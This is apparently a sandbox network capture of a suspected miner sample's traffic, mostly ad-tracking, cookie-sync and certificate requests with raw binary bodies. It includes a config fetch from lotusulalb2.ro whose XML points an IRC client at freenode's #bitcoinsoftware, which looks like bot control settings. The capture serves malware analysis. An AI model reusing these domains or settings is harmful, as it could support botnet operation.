Cookie: v12group=T2JqAQIWYXZyby5zY2hlbWHcA3sidHlwZSI6InJlY29yZCIsIm5hbWUiOiJjb29raWUiLCJuYW1lc3BhY2UiOiJ2MTIucGl4ZWwiLCJmaWVsZHMiOlt7Im5hbWUiOiJjb29raWVJZCIsInR5cGUiOiJzdHJpbmcifSx7Im5hbWUiOiJsYXN0U2VlbiIsInR5cGUiOiJsb25nIn0seyJuYW1lIjoidGltZXNTZWVuIiwidHlwZSI6ImludCJ9LHsibmFtZSI6InN1bUludGVydmFscyIsInR5cGUiOiJpbnQifSx7Im5hbWUiOiJzaXplIiwidHlwZSI6ImludCJ9XX0AOw/09Srs/B8hU8gYy pnRgJSSDZlMDRhYTZhLTc4YmQtNGRkYy1hN2VmLTNjNWU1N2QzNGZmYgAAAAA7D/T1Kuz8HyFTyBjL6mdG


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:05:47 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

Server: Apache-Coyote/1.1

P3P: CP="NOI OUR BUS UNI COM NAV"

Set-Cookie: v12group="T2JqAQIWYXZyby5zY2hlbWHcA3sidHlwZSI6InJlY29yZCIsIm5hbWUiOiJjb29raWUiLCJuYW1lc3BhY2UiOiJ2MTIucGl4ZWwiLCJmaWVsZHMiOlt7Im5hbWUiOiJjb29raWVJZCIsInR5cGUiOiJzdHJpbmcifSx7Im5hbWUiOiJsYXN0U2VlbiIsInR5cGUiOiJsb25nIn0seyJuYW1lIjoidGltZXNTZWVuIiwidHlwZSI6ImludCJ9LHsibmFtZSI6InN1bUludGVydmFscyIsInR5cGUiOiJpbnQifSx7Im5hbWUiOiJzaXplIiwidHlwZSI6ImludCJ9XX0Akv8FND1rHyX3GB4g/B4YmAJUSDZlMDRhYTZhLTc4YmQtNGRkYy1hN2VmLTNjNWU1N2QzNGZmYgAAAPgGkv8FND1rHyX3GB4g/B4YmA=="; Version=1; Domain=v12group.com; Max-Age=31536000; Expires=Sat, 21-Jul-2018 15:05:47 GMT; Path=/

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Date: Fri,
 21 Jul 2017 15:05:47 GMT..Content-Type: image/gif..Content-Length: 43
..Connection: keep-alive..Server: Apache-Coyote/1.1..P3P: CP="NOI OUR 
BUS UNI COM NAV"..Set-Cookie: v12group="T2JqAQIWYXZyby5zY2hlbWHcA3sidH
lwZSI6InJlY29yZCIsIm5hbWUiOiJjb29raWUiLCJuYW1lc3BhY2UiOiJ2MTIucGl4ZWwi
LCJmaWVsZHMiOlt7Im5hbWUiOiJjb29raWVJZCIsInR5cGUiOiJzdHJpbmcifSx7Im5hbW
UiOiJsYXN0U2VlbiIsInR5cGUiOiJsb25nIn0seyJuYW1lIjoidGltZXNTZWVuIiwidHlw
ZSI6ImludCJ9LHsibmFtZSI6InN1bUludGVydmFscyIsInR5cGUiOiJpbnQifSx7Im5hbW
UiOiJzaXplIiwidHlwZSI6ImludCJ9XX0Akv8FND1rHyX3GB4g/B4YmAJUSDZlMDRhYTZh
LTc4YmQtNGRkYy1hN2VmLTNjNWU1N2QzNGZmYgAAAPgGkv8FND1rHyX3GB4g/B4YmA==";
 Version=1; Domain=v12group.com; Max-Age=31536000; Expires=Sat, 21-Jul
-2018 15:05:47 GMT; Path=/..GIF89a.............!.......,...........D..
;..

<<< skipped >>>

GET /issuers/STCA.crt HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ssl.trustwave.com


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Wed, 21 Jun 2017 00:03:30 GMT

ETag: "483be-3bc-5526d19201880"

Accept-Ranges: bytes

Content-Length: 956

Content-Type: application/pkix-cert

X-Frame-Options: SAMEORIGIN

X-XSS-Protection: 1; mode=block

X-Content-Type-Options: nosniff

X-Handled-By: hXXp://ssl.trustwave.com

Date: Fri, 21 Jul 2017 15:06:03 GMT

Connection: keep-alive

0...0.............\....B...'.Y.0...*.H........0H1.0...U....US1 0...U..
..SecureTrust Corporation1.0...U....SecureTrust CA0...061107193118Z..2
91231194055Z0H1.0...U....US1 0...U....SecureTrust Corporation1.0...U..
..SecureTrust CA0.."0...*.H.............0...................O...x.X.A.
..@$.9.3f.....b\...$[a....A..n.........H.......A>...)........m.g.W.
........f%H...].....O.F..\..^..m......o1BlR>h...4....V.&....o......
.d.KD.....c.f.v.q..6.hzw..../.z..r...k.....Y?.r.D$..s...W/B&..t..R.K.S
|G.6..f....4W.f....pT....(.Y...........0..0... .....7.......C.A0...U..
......0...U.......0....0...U......B2......]Kz...L@.ZC.04..U...-0 0).'.
%.#hXXp://crl.securetrust.com/STCA.crl0... .....7.......0...*.H.......
......0.OJ.X:Rr[...e...Q;w.....\.Ee{..[.pP.....I..A..s.~.#!....`.Zr...
.....zo]......iB..q...&....j.q......|!T .X..W).....&.......i........ .
64{$.xL....&..dR6_`g....t..g#.........0.7~..2.-.D00l....4...@.K.fF.T..
2.c&0k....G....b....g.x)c.o....L...7...(K..,..h....1HTTP/1.1 200 OK..S
erver: Apache..Last-Modified: Wed, 21 Jun 2017 00:03:30 GMT..ETag: "48
3be-3bc-5526d19201880"..Accept-Ranges: bytes..Content-Length: 956..Con
tent-Type: application/pkix-cert..X-Frame-Options: SAMEORIGIN..X-XSS-P
rotection: 1; mode=block..X-Content-Type-Options: nosniff..X-Handled-B
y: hXXp://ssl.trustwave.com..Date: Fri, 21 Jul 2017 15:06:03 GMT..Conn
ection: keep-alive..0...0.............\....B...'.Y.0...*.H........0H1.
0...U....US1 0...U....SecureTrust Corporation1.0...U....SecureTrust CA
0...061107193118Z..291231194055Z0H1.0...U....US1 0...U....SecureTr

<<< skipped >>>

GET /COMODORSADomainValidationSecureServerCA.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.comodoca.com


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:06:18 GMT

Content-Type: application/x-pkcs7-crl

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d68517b1222d55cf37332456f6f924e801500649578; expires=Sat, 21-Jul-18 15:06:18 GMT; path=/; domain=.comodoca.com; HttpOnly

Last-Modified: Fri, 21 Jul 2017 13:31:09 GMT

ETag: W/"5972021d-18dd25"

X-CCACDN-Mirror-ID: rmdccacrl3

Cache-Control: public, max-age=14400

X-Frame-Options: SAMEORIGIN

X-Content-Type-Options: nosniff

X-XSS-Protection: 1; mode=block

CF-Cache-Status: HIT

Expires: Fri, 21 Jul 2017 19:06:18 GMT

Server: cloudflare-nginx

CF-RAY: 381f103a24ca842a-KBP

5bb2..0.(.$0.(.....0...*.H........0..1.0...U....GB1.0...U....Greater M
anchester1.0...U....Salford1.0...U....COMODO CA Limited1604..U...-COMO
DO RSA Domain Validation Secure Server CA..170721133109Z..170725133109
Z0.(..0!....w`.h.**..$.R.\..140220191049Z0!.......u,y".QU..A...1404101
54408Z0"........fU.%....}....140410172927Z0".....,.jc...Q..FV....14041
0185945Z0!...0...:.Km.~..V....140410214937Z0!..cE...2!D....,It...14041
0215014Z0"......*{u.....BZ.....140410223535Z0!.....(..7./.9..n....1404
10224524Z0!..].F.L.....|.O .,..140410224851Z0!..\...Y...N.........1404
10230501Z0"....P.#.~..>.U><.....140411065449Z0!..4...Y/X..f..
.cb...140411174902Z0"......xW {d...rW?.P..140412021032Z0".......#.8...
d.."L#..140412114042Z0"....x.{...!..........140412155740Z0!..M..\_L.3.
.5}.).5..140412171532Z0"......b/.m.../.Z.Y...140412175728Z0!..0.......
.....T.3..140412183108Z0".....dIk......b..C...140412200345Z0".........
._$.........140413022007Z0"............C..c.....140413104918Z0"......n
...xS.Y.E..J..140413123759Z0!..p..J.)vO.'...x.]..140413143438Z0!..4...
r..V..g.B.....140413190918Z0"......R.g.t.......R..140414052550Z0!...C.
.7Q`h....K.^...140414052610Z0".....*Ie? ........f..140414073608Z0"....
Q...i.A...Dr..P..140414115149Z0"............,........140414170043Z0"..
....GD.g..C..?.....140414180926Z0!..E..."v...C. @.....140415080708Z0!.
.4.w@g....km...N...140415163931Z0!..i..._.n...j.......140415172937Z0".
....8...1/k.2d.8....140415175434Z0"....]a~...6|.E...V...140415192736Z0
".....vqxC.3..U..t....140415230038Z0!........|...T.^)....140416202

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR64T7ooMQqLLQoy+emBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEEEVCOlPdt2vCNZMypqho4I= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.comodoca.com


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:06:14 GMT

Server: Apache

Last-Modified: Wed, 19 Jul 2017 14:45:08 GMT

Expires: Wed, 26 Jul 2017 14:45:08 GMT

ETag: BAAED4660A45A6F68B09DCB513EC96273315B04C

Cache-Control: max-age=430133,public,no-transform,must-revalidate

X-OCSP-Reponder-ID: rmdccaocsp31

Content-Length: 471

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0........j:.Z.....Vs.C.:(....2017071
9144508Z0s0q0I0... ........z.>...*,.(....F.@.......j:.Z.....Vs.C.:(
....A...Ov....L.........20170719144508Z....20170726144508Z0...*.H.....
........n.K..d....1.c..OK.1;.lj.N.$....".*u7P.....0F.E*...k.x.A.....r.
...`.x0!.r......2..N..2.I..Z..K...k..4..,....=.w.D..WU.XS~;T....5..>
;Y../....9LzB..0..e...A....p.Z.........C(..q.h...-...|Z..>-.......L
.O5|E.}..b.kp.9r..mk.?.~./.....f..Z..../...f.B. .......8..ZC..

GET /cm/?rd=http://ps.eyeota.net/match?bid=6bmpi0v&uid={UUID} HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: eyeota2waycm.netmng.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:06:02 GMT

Server: Apache/2.2.22

Content-Length: 35

Keep-Alive: timeout=3, max=9990404

Connection: Keep-Alive

Content-Type: image/gif

GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Fri, 21 Jul 
2017 15:06:02 GMT..Server: Apache/2.2.22..Content-Length: 35..Keep-Ali
ve: timeout=3, max=9990404..Connection: Keep-Alive..Content-Type: imag
e/gif..GIF89a.............,...........D..;..

GET /js15_as.js HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: s10.histats.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:01:43 GMT

ETag: "1262556565"

Last-Modified: Mon, 12 Jun 2017 15:26:33 GMT

Content-Type: text/javascript

Content-Length: 4243

Content-Encoding: gzip

Vary: Accept-Encoding

X-CDN-Pop: sbg

X-CDN-Pop-IP: 137.74.120.32/27

X-Cacheable: Matched cache

Accept-Ranges: bytes

X-IPLB-Instance: 4761
.............w.8...m/.......B.l..I..t..v.e.....dj.....oF........bif$.F
....`&..F....~\...D..B...J.....s9.EE..<.T..c".....}...s...2Bh..\...
..$.'`...t\B=..5.1...>#...u..}.]_..:`d.&.......M.>O.I8..G.Y.cB. 
...0....*......na..{....H$..;.h....xaIX...p6.B&vJ..9i.%.3.\>.../T?b
....5...:...C_F1l0t. .\.6C....6.:.}9.=...".R..&.o.....1W..]..a..p.....
..Zw.|.h..."J..IOO2.a...X.......-*..........H..i...u......H.dm....F4..
....h......~.....zn..E.A-5.......@..0.^K..L...C1$[.0.K.......{(....t..
.....C........]J...vv..u..~t.!.....g.:.]..<ny'W^....}n_...&]..W.r..
.3'.a..e.U.^.n@4..U.......D.U...@.'......_.5.Ql)5.C..[8#?...p..<.. 
.zn.Tt...S:f5z]T..j5...CrE5..........g...b.Y..l.g.b...j.... ....t4=$..
......9.....|...|.. &...iLu..ES..=.-{.Z.(...wd.=e.`t?k...X..-.A}/1 .|V
S&...Mh#P..V.............LMcz.4s}f.^.=5U.gX.5.j....lW.. ..........-.Hq
..}n.o.3.....h..gf.^...T....=.........H.V...C$............3..X?}@)}..r
.........w....e/....{....ntq..B.vP.?. ....L....?|o{.Z.."..Sdp.5.[..N..
.._.j....}Z....p...?~..1o.o3p|->.1......v8.....u....[...X...p..tj..
2t.x.6..........IT....}_.q.1...%h.i......S7._@.@...]W....9....o66i$.4.
..,.O.(..i..(......K.......Q.....>...I..cL..D....?E.G.....T%.....y.
...........ca..CP.N......^...s_CIe.......=@..4.!T.....9.....;.k.....o.
.,..Y.{.W$;v#_..&..{..._J....Zp.i.v........x.`.e%..1p...p..zED.7p.@z..
.85.e$Oi\2).....}&..`.9.....p.R].J...oo7...@....(.c.U.[.....0.....2s.%
\.c.U....-D..jF.!.H.S~r.;...nlo.....8X.......!w"............C...G~....
.6.m.....[..\.5.- f.1..8.u..|k.......KQ..D...l....&ex.$.R..h....R.<<< skipped >>>

GET /s/opensans/v14/xjAJXh38I15wypJXxuGMBmOb2gHztoQeulij-1lvl-8.woff HTTP/1.1

Accept: */*

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Origin: hXXp://easyminer.net

Accept-Encoding: gzip, deflate

Host: fonts.gstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: font/woff

Access-Control-Allow-Origin: *

Timing-Allow-Origin: *

Content-Length: 23388

Date: Wed, 28 Jun 2017 12:00:40 GMT

Expires: Thu, 28 Jun 2018 12:00:40 GMT

Last-Modified: Wed, 14 Jun 2017 16:46:25 GMT

X-Content-Type-Options: nosniff

Server: sffe

X-XSS-Protection: 1; mode=block

Cache-Control: public, max-age=31536000

Age: 1998300
wOFF......[\.......0........................GDEF.......(...(....GPOS..
..............GSUB.......X...t.[..OS/2.......Z...`.D.Rcmap...l........
....cvt ...L...W........fpgm............~a..gasp...@...........#glyf..
.P..Hs..n.\Y..head..P....6...6..z.hhea..P....#...$. .~hmtx..Q ........
rSU.loca..T(............maxp..V.... ... ....name..V........T..2.post..
Wx..........Urprep..Zl........T..................................4...6
.F..................x......P...s..I.....P* ..........<p8....|..O..4
..}... z}..[smkg.......{s.S...[..3..3.;..x.c`f.f......:.....Q.B3_dHcb`
``.fccfeabbi``R..x3@..c.3.#......?....^...... 9...m@J.......%..x.}.%X.
a....cqw.E;.k.[.z.A%..^.x............Wf.........d...0.P...c.[P.Au.....
.?Wq57p3....I.$H..K..K..&E$.(.@L].~.c...?..`..n.^..P.../.e.......A..P]
..x7.. @....Y........................#.....t6\.ea..X.*.......lb...M..H
....N..x.c.a.g.c..$KY...e@.,.."..........?.....g....Z...[..5...=.d....
...p.a.C?C..L...FF~..,...x.uTGw.F.........)..)7..W.$`*.......G..Kz.)e.
...t.|.1.7....s.g....3.7mgf..~{1...s.3.S...co..o.~.Zy..u...kW.\.t.....
N.KG............K{..L:548..gqV..#.......C\/..?...K>...X =.G.^7..(".
#1Q...zd.......z.....u....V....3...j...5.....(yR\.<LU.Z.c.QC.....l.
...L...L..,Ix.6.~.&7.u...X,.. ..~...3..9...K...j.bU....8dB.u]:..I.....
.Rt".. .;..b.U}.R.b.........a:.*......ul..g.QJ..E.....8....H.A...}.E..
.g.._N@.V*...H....%.6.$.S.>..MK....t0....5...s.`v....-.*....B.[.^v.
B.f.E4........6l.<.D.6gd[.l..b...!Z.f.u....iv..{...fN*./...O.....D.
............ ......>.].80....q.....l...~.:...^q.(.....u>.5.)<<< skipped >>>

GET /e/?v=1a&pid=5200&site=1&l=http://easyminer.net/&j= HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: e.dtscout.com

Connection: Keep-Alive

Cookie: m=1; b=1; ey=1; ah=1; df=1500649541; d=null; l=a7bnLVlyGEWxLEMm35YiAg==


HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)

Date: Fri, 21 Jul 2017 15:06:26 GMT

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: close

X-Z: E

Set-Cookie: b=2; expires=Fri, 21-Jul-2017 23:06:26 GMT; Max-Age=28800; path=/; domain=dtscout.com

Set-Cookie: ah=2; expires=Sat, 22-Jul-2017 15:06:26 GMT; Max-Age=86400; path=/; domain=dtscout.com

Set-Cookie: es=1; expires=Fri, 21-Jul-2017 23:06:26 GMT; Max-Age=28800; path=/; domain=dtscout.com

Set-Cookie: d=null; expires=Wed, 20-Jul-2022 15:06:26 GMT; Max-Age=157680000; path=/; domain=dtscout.com

Expires: Fri, 21 Jul 2017 15:06:25 GMT

Cache-Control: no-cache
e1a..(function() {.    var dc = {};.    var gu = "2DE7B66B451872592643
2CB1022296DF".    String.prototype.dts_hash_code=function(){var hash=0
;if(this.length==0)return hash;for(i=0;i<this.length;i  ){char=this
.charCodeAt(i);hash=((hash<<5)-hash) char;hash=hash&hash}return 
hash;};..    function _dtsi() {.        a = document.createElement("a"
), a.href = window.location.href, _dts.host = a.hostname, "undefined" 
!= typeof document.referrer && document.referrer.length > 0 ? (_dts
.r = document.referrer, _dts.p = _dts_gp(_dts.r), "q" in _dts.p ? _dts
.q = _dts.p.q : "query" in _dts.p ? _dts.q = _dts.p.query : "p" in _dt
s.p ? _dts.q = _dts.p.p : "text" in _dts.p ? _dts.q = _dts.p.text : "w
d" in _dts.p ? _dts.q = _dts.p.wd : _dts.q = 0) : (_dts.r = 0, _dts.q 
= 0).    }.    var _dts = {};.    _dtsi();..    function __dtsinit() {
.        var c = document.cookie.split(';');.        for(i = c.length 
- 1; i >= 0; i--) {.           cv = c[i].trim().split('=');.       
    dc[cv[0]] = cv[1];.        }.    }.    var di = __dtsinit();..    
if(gu !== false && gu.length > 15) {.        lp(gu);.    } else if(
"__dtsu" in dc && dc.__dtsu.length > 15) {.        lp(dc.__dtsu);. 
   } else {.        window.addEventListener('message', function(e) {. 
           if(e.origin.indexOf('dtscout.com') >= 0) {.             
   if(e.data.length > 0) {.                    var temp = JSON.pars
e(e.data);.                    lp(temp.u);.                }.         
   }.        });..        var i = document.createElement('iframe')<<< skipped >>>

GET /getuid?url=http://ps.eyeota.net/match?bid=b2c3gb0&uid={{UUID}}
 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ads.avocet.io

Connection: Keep-Alive


HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8

Date: Fri, 21 Jul 2017 15:05:57 GMT

Location: /getuid?bounce=true&url=http://ps.eyeota.net/match?bid=b2c3gb0&uid={{UUID}}

P3p: policyref="hXXp://cdn.avocet.io/w3c/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"

Set-Cookie: uuid=005297fc-ec97-47a0-a704-4984e8b602f2; Path=/; Expires=Sat, 21 Jul 2018 15:05:57 GMT; Max-Age=31536000; HttpOnly

Content-Length: 129

Connection: keep-alive
<a href="/getuid?bounce=true&url=http://ps.eyeota.net/m
atch?bid=b2c3gb0&uid={{UUID}}
">Found</a>..
.HTTP/1.1 302 Found..Content-Type: text/html; charset=utf-8..Date: Fri
, 21 Jul 2017 15:05:57 GMT..Location: /getuid?bounce=true&url=http:%
2F/ps.eyeota.net/match?bid=b2c3gb0&uid={{UUID}}

..P3p: policyref="hXXp://cdn.avocet.io/w3c/p3p.xml", CP="NOI DSP COR A
DM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"..Set-Cookie:
 uuid=005297fc-ec97-47a0-a704-4984e8b602f2; Path=/; Expires=Sat, 21 Ju
l 2018 15:05:57 GMT; Max-Age=31536000; HttpOnly..Content-Length: 129..
Connection: keep-alive..<a href="/getuid?bounce=true&url=http%3
A//ps.eyeota.net/match?bid=b2c3gb0&uid={{UUID}}%
0A">Found</a>.....

GET /idg/ HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: t.dtscout.com

Connection: Keep-Alive

Cookie: m=1; b=1; ey=1; ah=1; df=1500649541; d=null; l=a7bnLVlyGEWxLEMm35YiAg==


HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)

Date: Fri, 21 Jul 2017 15:05:41 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: close

Expires: Fri, 21 Jul 2017 15:05:40 GMT

Cache-Control: no-cache

Content-Encoding: gzip
1d9............}S.N.0... ..$E.B..lC.].i....P...Dr.*v..P.}g<NR`.\...
y..f..v...."O....:?....jgS...\.#] -r~.7m..J.....?..m.........u.....W.7
...m<....\^..q|;....C....w@..-R.u.........e$.[iK}..j.....uaK..s....
r'......X...kc....x.`....{R.%...!5..R...".|PE.........Q..JgB.Z..BF....
.......:....3..s......`L....9ZH..Y.&.ia.`......~.qd...N..4.{E..*.i..~.
...... IC._.B..E-.g0...u./...W..5..#@O..M.x...b....C..iq.[..#....6....
....m...>Ic`.....sD.Zm.!.LO..d..X..L...%.....X2..8................0
..

GET /GenericUserSync.ashx?dpid=42 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: sync.tidaltv.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Cache-Control: no-cache, no-store, max-age=0, must-revalidate

Date: Fri, 21 Jul 2017 15:05:46 GMT

Expires: 0

Location: hXXp://ps.eyeota.net/match?bid=2crn9e1&uid=b251d362-2acd-4970-85f4-3b4fcf2264c8

Pragma: no-cache

Server: Apache-Coyote/1.1

Set-Cookie: tidal_ttid=b251d362-2acd-4970-85f4-3b4fcf2264c8; Domain=.tidaltv.com; Expires=Sat, 21-Jul-2018 15:05:47 GMT; Path=/

Set-Cookie: sync-his="H4sIAAAAAAAAADM0NDa1tDI0tAQAInhO1AkAAAA="; Version=1; Domain=.tidaltv.com; Max-Age=31536000; Expires=Sat, 21-Jul-2018 15:05:47 GMT; Path=/

X-Content-Type-Options: nosniff

X-Frame-Options: DENY

X-XSS-Protection: 1; mode=block

Content-Length: 0

Connection: keep-alive
HTTP/1.1 302 Found..Cache-Control: no-cache, no-store, max-age=0, must
-revalidate..Date: Fri, 21 Jul 2017 15:05:46 GMT..Expires: 0..Location
: hXXp://ps.eyeota.net/match?bid=2crn9e1&uid=b251d362-2acd-4970-85f4-3
b4fcf2264c8..Pragma: no-cache..Server: Apache-Coyote/1.1..Set-Cookie: 
tidal_ttid=b251d362-2acd-4970-85f4-3b4fcf2264c8; Domain=.tidaltv.com; 
Expires=Sat, 21-Jul-2018 15:05:47 GMT; Path=/..Set-Cookie: sync-his="H
4sIAAAAAAAAADM0NDa1tDI0tAQAInhO1AkAAAA="; Version=1; Domain=.tidaltv.c
om; Max-Age=31536000; Expires=Sat, 21-Jul-2018 15:05:47 GMT; Path=/..X
-Content-Type-Options: nosniff..X-Frame-Options: DENY..X-XSS-Protectio
n: 1; mode=block..Content-Length: 0..Connection: keep-alive..

GET /easyminer/settings.xml HTTP/1.1

Connection: Keep-Alive

Host: lotusulalb2.ro

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


HTTP/1.1 200 OK

Cache-Control: public, max-age=3600,public, must-revalidate, proxy-revalidate

Expires: Fri, 21 Jul 2017 16:05:38 GMT

Last-Modified: Mon, 21 Dec 2015 19:02:58 GMT

Content-Type: text/xml

Content-Length: 2463

Date: Fri, 21 Jul 2017 15:05:38 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
<?xml version="1.0"?>.<NetChatLink>..<CheckUpdates>0
</CheckUpdates>..<AutoConnect>0</AutoConnect>..<S
tartup>0</Startup>..<PID>UP4Z5OJI4P3CWPUUNWFWYFRPGJF3QK
W6IZZQYJI</PID>..<Words/>..<Hubs/>..<Ircs>...&
lt;Item>....<Name>Server1aaaaa</Name>....<Server>
chat.freenode.net:6665</Server>....<Nick>^|playa_XE</Ni
ck>....<Pass/>....<Prefix>[radio]</Prefix>....<
;Ident/>....<Chans>#bitcoinsoftware</Chans>....<MsgR
ate>0</MsgRate>....<PMRate>0</PMRate>....<Show
JP>0</ShowJP>....<OPsCon>0</OPsCon>....<Enable
d>1</Enabled>....<From>0</From>....<To>0<
;/To>....<Users/>....<Startup/>...</Item>...<I
tem>....<Name>Serveraaaa1</Name>....<Server>chat.
freenode.net:6666</Server>....<Nick>^|playa_XE</Nick>
;....<Pass/>....<Prefix>[radio]</Prefix>....<Iden
t/>....<Chans>#bitcoinsoftware</Chans>....<MsgRate&g
t;0</MsgRate>....<PMRate>0</PMRate>....<ShowJP>
;0</ShowJP>....<OPsCon>0</OPsCon>....<Enabled>
1</Enabled>....<From>0</From>....<To>0</To&
gt;....<Users/>....<Startup/>...</Item>...<Item&g
t;....<Name>Servaaaaaer1</Name>....<Server>chat.free
node.net:6667</Server>....<Nick>^|playa_XE</Nick><<< skipped >>>

GET /r1/pixel/x31662 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: rs.gwallet.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Content-Length: 0

Server: radiumone/1.4.2

Pragma: no-cache

P3p: CP="PSAo PSDo OUR BUS DSP NON COR"

Content-type: application/octet-stream

Expires: Tue, 29 Oct 2002 19:50:44 GMT

Set-cookie: ra1_uid=5797775682027760384; Expires=Sat, 21-Jul-2018 15:06:02 GMT; Path=/; Domain=gwallet.com; Version=1

Set-cookie: ra1_sid=263; Expires=Sat, 21-Jul-2018 15:06:02 GMT; Path=/; Domain=gwallet.com; Version=1

Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate

Location: //rp.gwallet.com/r1/cm/p58

Set-Cookie: RA1balancer=MTAuMTAzLjIuNzIgODg4OCB2Mg==;Path=/;Domain=.gwallet.com;Expires=Sat, 21-Jul-2018 15:06:02 GMT
HTTP/1.1 302 Found..Content-Length: 0..Server: radiumone/1.4.2..Pragma
: no-cache..P3p: CP="PSAo PSDo OUR BUS DSP NON COR"..Content-type: app
lication/octet-stream..Expires: Tue, 29 Oct 2002 19:50:44 GMT..Set-coo
kie: ra1_uid=5797775682027760384; Expires=Sat, 21-Jul-2018 15:06:02 GM
T; Path=/; Domain=gwallet.com; Version=1..Set-cookie: ra1_sid=263; Exp
ires=Sat, 21-Jul-2018 15:06:02 GMT; Path=/; Domain=gwallet.com; Versio
n=1..Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-reva
lidate..Location: //rp.gwallet.com/r1/cm/p58..Set-Cookie: RA1balancer=
MTAuMTAzLjIuNzIgODg4OCB2Mg==;Path=/;Domain=.gwallet.com;Expires=Sat, 2
1-Jul-2018 15:06:02 GMT..

GET /templates/kickstart/img/1.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:39 GMT

Last-Modified: Mon, 17 Apr 2017 21:11:34 GMT

Content-Type: image/png

Content-Length: 153178

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
.PNG........IHDR.......G......x......sRGB.........gAMA......a.... cHRM
..z&..............u0...`..:....p..Q<....IDATx^........g. ..........
....!.....$h<.$...w..[ ..$Aw....}.L...\H..z..........W_U..f....T..|
..7.|..7.|..7.|..|...gN..S..X.m..6^v. .M..&.n.e.)..T.m..6]v.!....f.n..
.9..\....m..6_z[ .. .-....n.Io..n.e.%..R.m...\v[!.} .}(.}$.},.}".}*.}&
.}..}!....V.n_.n_Io_.n.e.5..7.....Z.m...^v. .m..6.n.e.-..w..V.m...]v.!
..|.6`..(:..1...P.......(.t.D...&...0N(.@pBA.L./.9..A.Q.G..... 9o.6g..
..v.....#.tP...A(....-C(....O.P.A...W...^...d8......U"..rr.........K.2
